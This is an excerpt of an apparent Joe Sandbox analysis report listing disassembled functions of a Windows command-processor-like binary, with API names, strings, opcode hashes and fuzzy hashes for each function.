                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswspace
                                              • String ID: off
                                              • API String ID: 2389812497-733764931
                                              • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                              • Instruction ID: 7ab27fa02a0a569c375a5b1fa0d5c8b9bd6035af35a7e28bd8d322e0b18dd8cc
                                              • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                              • Instruction Fuzzy Hash: 13215E23E0C65281FA605B15B6503F966A0FF4DBA8F5C8035ED0EC76A4DF2EE641970B
                                              Function 00007FF6EB199308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heapiswspace$AllocProcess
                                              • String ID: %s=%s$DPATH$PATH
                                              • API String ID: 3731854180-3148396303
                                              • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                              • Instruction ID: 62c53ce127e9afd0b0ffd137db37602279efe43236b8a6249fde57a5222adde8
                                              • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                              • Instruction Fuzzy Hash: CF21B323B0968680EA508F65E4403F523A0AF8CBE8F884035C90EC73B4DF2EE644874A
                                              Function 00007FF6EB188198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcscmp
                                              • String ID: *.*$????????.???
                                              • API String ID: 3392835482-3870530610
                                              • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                              • Instruction ID: 11c45e1f9167d73698d8d2b5c895d0055b5948f32683e921f66601718a5cae3d
                                              • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                              • Instruction Fuzzy Hash: 0B11E526B24A5281E7658F26B4402B9B3A1FB4CB94F185030CE8D87B69DF3EE441C709
                                              Function 00007FF6EB199114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: fprintf
                                              • String ID: CMD Internal Error %s$%s$Null environment
                                              • API String ID: 383729395-2781220306
                                              • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                              • Instruction ID: 5536a2873e0241de2371be545cf7da72d6289bd92f35caf4f2b0d95cb0b6a4fa
                                              • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                              • Instruction Fuzzy Hash: AF119133908682C1EA558B14E9402F96261FB4C7F8F445332D67D832F4EF2EE485874A
                                              Function 00007FF6EB1809F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswspacewcschr
                                              • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                              • API String ID: 287713880-1183017076
                                              • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                              • Instruction ID: 802a0722d1b2a386ac4b76d3211fa66746a8b3d6fe1d77960468ac09a4bedeb3
                                              • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                              • Instruction Fuzzy Hash: DEF0A423A18657C1EA608B41B4043B66690FF4DF68B469135E94E82374DF2EE444C70A
                                              Function 00007FF6EB1804F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: KERNEL32.DLL$SetThreadUILanguage
                                              • API String ID: 1646373207-2530943252
                                              • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                              • Instruction ID: 3dea42dffc85d8f21959ad4a8c880efcb27f43622a36b88b9bad74bbe207ed66
                                              • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                              • Instruction Fuzzy Hash: 99010863E09B07C5EA448B11B8913F462A0EF4E738F540339D53E923F0DE2E7485870A
                                              Function 00007FF6EB1973C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: RaiseFailFastException$kernelbase.dll
                                              • API String ID: 1646373207-919018592
                                              • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                              • Instruction ID: 4f8203e3fd4907c643268ab677503bf4f31a9eb7737a4495fba29a3bc8669933
                                              • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                              • Instruction Fuzzy Hash: 09F03022B1878192E6044F12F5442B9BA60FF8DBE4B449134DA4E83B24CF3DE449CB05
                                              Function 00007FF6EB171130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$CurrentDirectorytowupper
                                              • String ID:
                                              • API String ID: 1403193329-0
                                              • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                              • Instruction ID: 28940a929975d41681973c16c69075499e64828228b21c54ffa0d37e7388adbe
                                              • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                              • Instruction Fuzzy Hash: 7C61CE33A18B928AEB20CB21E8403ED37A4FB89768F104134DE5D93BA9DF79E450C705
                                              Function 00007FF6EB184878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp$wcschr
                                              • String ID:
                                              • API String ID: 3270668897-0
                                              • Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                              • Instruction ID: 171141bf0dcb904ab1a4cbb9127d434c51bbc51e55c5ecca81bd9a9267663299
                                              • Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                              • Instruction Fuzzy Hash: 5851A313E0C64281EB619F10E4403F8A3A1FF4DBA8F588131DA4EC76F9DE2EE545835A
                                              Function 00007FF6EB19F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveFullNamePathType
                                              • String ID:
                                              • API String ID: 3442494845-0
                                              • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                              • Instruction ID: 116b7926e7ae58be723d5bc75909094960bea220d9b84d6a86078f43e30d1c7a
                                              • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                              • Instruction Fuzzy Hash: C831AF33615BC18AEB60CF11E8443E973A4FB89B88F044035DA4D87B64CF39E245C700
                                              Function 00007FF6EB188F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                              • String ID:
                                              • API String ID: 140117192-0
                                              • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                              • Instruction ID: fa79b173a9db915869f3fecc71684ef5ce07706224ceeb39ef2b6c669e847bd2
                                              • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                              • Instruction Fuzzy Hash: 7441B676A08F4195EB509B18F8903E573A4FB8C768F904036DA8D92774DF7EE548CB05
                                              Function 00007FF6EB188470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcstol$lstrcmp
                                              • String ID:
                                              • API String ID: 3515581199-0
                                              • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                              • Instruction ID: b27757fd27c20424b43842c56d115df4a6b3308f9ef2355141ce87de34d02cc8
                                              • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                              • Instruction Fuzzy Hash: 5D21E433A08742C3E7624B79A5943BAABA0FF4E768F415034DB4F82664DF6EE4458709
                                              Function 00007FF6EB174F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File_get_osfhandle$TimeWrite
                                              • String ID:
                                              • API String ID: 4019809305-0
                                              • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                              • Instruction ID: 841eedb2b92e915e253b8a1e62f7a320c0fcfab1e5dcdf917ea22e3ca0a7e621
                                              • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                              • Instruction Fuzzy Hash: 0E31B723A0879686E7544B14A8443B8A691FF4DB78F045138D90DC3BF9CF3ED844874A
                                              Function 00007FF6EB1A1914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveNamePathTypeVolume
                                              • String ID:
                                              • API String ID: 1029679093-0
                                              • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                              • Instruction ID: 792c95c1463159c09c497f4e8b6749e59e4c4b95315d65dd42243521c8148662
                                              • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                              • Instruction Fuzzy Hash: D0313A33705B818AEB208F21D9943E867A4FB8DB98F444135CA4D87758DF3DE659CB05
                                              Function 00007FF6EB19E810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                              • String ID:
                                              • API String ID: 2448200120-0
                                              • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                              • Instruction ID: 242ac6c27e0fbc9c25ac277560cce1a49fe0743786cc62749fd2a0296ec92f79
                                              • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                              • Instruction Fuzzy Hash: AC216133A18786C7E7545B11E5403F9B6A1FB8DBA9F144139D90D837A4CF3EE4058B0A
                                              Function 00007FF6EB187CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcess
                                              • String ID:
                                              • API String ID: 1617791916-0
                                              • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                              • Instruction ID: 6c7f37e0c5b0d58ac474f421fe30810d9f3b33dbe9da694c8aa192d980353a98
                                              • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                              • Instruction Fuzzy Hash: 1F219262A09B4286EA049B51A9402B9B7A1FF8DBE4B059230CE1E877B5DE3DF0058715
                                              Function 00007FF6EB176A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB183C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB183D0C
                                                • Part of subcall function 00007FF6EB183C24: towupper.MSVCRT ref: 00007FF6EB183D2F
                                                • Part of subcall function 00007FF6EB183C24: iswalpha.MSVCRT ref: 00007FF6EB183D4F
                                                • Part of subcall function 00007FF6EB183C24: towupper.MSVCRT ref: 00007FF6EB183D75
                                                • Part of subcall function 00007FF6EB183C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183DBF
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB176ABF
                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB176AD3
                                                • Part of subcall function 00007FF6EB176B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6EB176AE8,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B8B
                                                • Part of subcall function 00007FF6EB176B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6EB176AE8,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B97
                                                • Part of subcall function 00007FF6EB176B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF6EB176AE8,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176BAF
                                                • Part of subcall function 00007FF6EB176B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB176AF1,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B39
                                                • Part of subcall function 00007FF6EB176B30: RtlFreeHeap.NTDLL(?,?,?,00007FF6EB176AF1,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B4D
